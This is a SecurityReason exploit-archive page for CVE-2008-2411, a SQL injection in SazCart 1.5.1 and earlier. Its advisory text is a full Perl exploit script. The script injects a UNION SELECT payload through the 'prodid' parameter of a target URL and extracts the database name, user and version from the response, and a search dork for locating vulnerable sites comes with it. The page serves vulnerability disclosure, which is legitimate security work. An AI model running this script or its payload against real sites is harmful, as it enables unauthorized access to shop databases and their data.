Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : SecurityAlert

  Topic : SazCart <= 1.5.1 (prodid) Remote SQL Injection Exploit
  SecurityAlert : 3900
  CVE : CVE-2008-2411
  SecurityRisk : Medium  alert  (About)
  Remote Exploit : Yes
  Local Exploit : No
  Exploit Given : Yes
  Credit : JosS
  Published : 22.05.2008

  Affected Software : SazCart <= v1.5.1



  Advisory Text :  

#!/usr/bin/perl

# SazCart <= v1.5.1 (details&prodid) Remote SQL Injection Exploit

# HomePage: http://www.sazcart.com

# Discovered & Coded by JosS

# Contact: sys-project[at]hotmail.com

# Spanish Hackers Team / Sys - Project / EspSeC

# http://www.spanish-hackers.com

# rgod forever :D

# Dork: "Powered by SazCart"

print "tt########################################################nn";

print "tt# SazCart <= v1.5.1 - Remote SQL Injection Exploit #nn";

print "tt# by JosS #nn";

print "tt########################################################nn";

use strict;

use LWP::UserAgent;

my $victim = $ARGV[0];

if(!$ARGV[0]) {

print "n[x] SazCart <= v1.5.1 - Remote SQL Injection Exploitn";

print "[x] written by JosS - sys-project[at]hotmail.comn";

print "[x] usage: perl xpl.pl [host]n";

print "[x] example: http://localhost/path/nn";

exit(1);

}

print "n[+] Exploiting...n";

my $cnx = LWP::UserAgent->new() or die;

my
$go=$cnx->get($victim."?details&prodid=1'+union+all+select+0,1,convert(c
oncat(database(),char(58),user(),char(58),version()),char),3,4/*");

if ($go->content =~ m/Price</b>:(.*?)<br/ms)

{

print "[+] $1nn";

} else {

print "n[-] exploit failedn";

}





  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

*BSD libc (strfmon) Multiple vulnerabilities

high- 2008-03-25

Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems.

Apache rss

» Apache Tomcat information
   disclosure

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability

PHP rss

» PHP 5.2.6 chdir(),ftok()
   (standard ext) safe_mode
   bypass

» PHP 5.2.6 posix_access()
   (posix ext) safe_mode
   bypass

» PHP 5.2.5 and prior :
   *printf() functions
   Integer Overflow

» PHP 5.2.5 cURL safe_mode
   bypass

Copyright © SecurityReason. All Rights Reserved.